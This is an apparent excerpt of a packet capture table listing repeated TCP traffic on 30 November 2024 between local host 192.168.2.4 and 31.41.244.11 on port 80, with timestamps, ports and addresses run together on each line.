                                                      Nov 30, 2024 18:08:28.320791006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.320830107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.321173906 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.321214914 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.321880102 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.321916103 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.322489977 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.322527885 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.323093891 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.323134899 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.323322058 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.323368073 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.324421883 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.324481964 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.324639082 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.324681044 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.325550079 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.325613022 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.325774908 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.325860977 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.326812029 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.326879025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.326996088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.327059031 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.327991009 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.328074932 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.328236103 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.328274965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.329226971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.329267025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.329435110 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.329493046 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.330427885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.330467939 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.330655098 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.330686092 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.331692934 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.331733942 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.331887007 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.331926107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.332889080 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.332927942 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.333098888 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.333137035 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.334264994 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.334316015 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.334429979 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.334465981 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.335378885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.335421085 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.335553885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.335592031 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.336570978 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.336611032 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.336796999 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.336834908 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.337824106 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.337884903 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.338057041 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.338094950 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.339026928 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.339066982 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.339215040 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.339256048 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.340260983 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.340310097 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.340472937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.340513945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.341521025 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.341564894 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.341705084 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.341742992 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.342685938 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.342737913 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.342885971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.342927933 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.343853951 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.343895912 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.477397919 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.477447033 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.477603912 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.477663994 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.477968931 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.478017092 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.478346109 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.478384018 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.478770971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.478811979 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.478950977 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.478987932 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.479871035 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.479912996 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.480032921 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.480067968 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.480968952 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.481014013 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.481156111 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.481199026 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.481952906 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.481993914 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.482120037 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.482168913 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.482973099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.483014107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.483171940 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.483213902 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.484031916 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.484071016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.484236002 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.484283924 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.485105991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.485148907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.485322952 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.485369921 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.486186028 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.486226082 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.486390114 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.486429930 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.487216949 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.487257957 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.487427950 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.487468958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.488250017 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.488292933 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.488466978 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.488569021 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.489301920 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.489341974 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.489502907 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.489547014 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.490367889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.490417957 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.490619898 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.490664959 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.491432905 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.491478920 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.491637945 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.491688013 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.492495060 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.492538929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.492712021 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.492754936 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.493554115 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.493592024 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.493777990 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.493827105 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.494595051 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.494637012 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.494798899 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.494843960 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.495646000 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.495693922 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.495862961 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.495904922 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.496710062 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.496773958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.496932983 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.496974945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.497766972 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.497883081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.497996092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.498047113 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.498817921 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.498861074 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.499026060 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.499068975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.499893904 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.499933958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.500121117 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.500163078 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.500929117 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.500967979 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.501147032 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.501187086 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.502027035 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.502078056 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.502217054 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.502263069 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.503060102 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.503102064 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.503287077 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.503333092 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.504101992 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.504168034 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.504307985 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.504347086 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.505162954 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.505203962 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.505383015 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.505424976 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.506236076 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.506279945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.506445885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.506490946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.507283926 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.507328987 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.507497072 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.507529974 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.508344889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.508394957 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.508536100 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.508598089 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.509383917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.509428978 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.509589911 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.509634018 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.510459900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.510528088 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.510668993 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.510710001 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.511513948 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.511548042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.511723995 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.511770964 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.512567043 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.512607098 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.512774944 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.512811899 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.513617039 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.513653994 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.513825893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.513864994 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.514683962 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.514725924 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.514889002 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.514930010 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.515755892 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.515810013 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.515959978 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.516010046 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.516834974 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.516885042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.517030001 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.517067909 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.517841101 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.517888069 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.518038034 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.518084049 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.518908024 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.518944979 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.519098997 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.519134998 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.520006895 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.520052910 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.520154953 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.520198107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.521015882 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.521070004 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.521213055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.521261930 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.522075891 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.522116899 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.522262096 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.522308111 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.523139000 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.523185015 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.523353100 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.523390055 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.524204969 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.524247885 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.524401903 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.524442911 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.525271893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.525312901 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.525549889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.525594950 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.526300907 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.526348114 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.526494026 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.526535988 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.527358055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.527405024 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.527570963 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.527609110 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.528408051 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.528448105 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.528614044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.528660059 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.529484987 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.529525042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.529674053 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.529750109 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.530559063 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.530611038 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.530757904 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.530801058 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.531618118 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.531668901 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.531800032 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.531841993 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.532628059 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.532670021 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.678720951 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.678903103 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.678939104 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.678982973 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.679207087 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.679255962 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.679555893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.679604053 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.680246115 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.680299044 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.680428028 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.680473089 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.681261063 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.681308031 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.681463957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.681509018 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.682367086 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.682430029 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.682576895 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.682621002 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.683391094 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.683434963 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.683587074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.683633089 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.684443951 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.684490919 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.684623957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.684670925 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.685513020 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.685559988 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.685714006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.685760975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.686583042 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.686633110 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.686743021 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.686786890 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.687609911 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.687659025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.687813044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.687853098 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.688662052 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.688707113 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.688863039 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.688929081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.689740896 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.689786911 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.689943075 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.689987898 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.690795898 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.690841913 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.690989017 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.691035032 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.691848040 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.691895008 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.692029953 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.692071915 CET4980580192.168.2.431.41.244.11
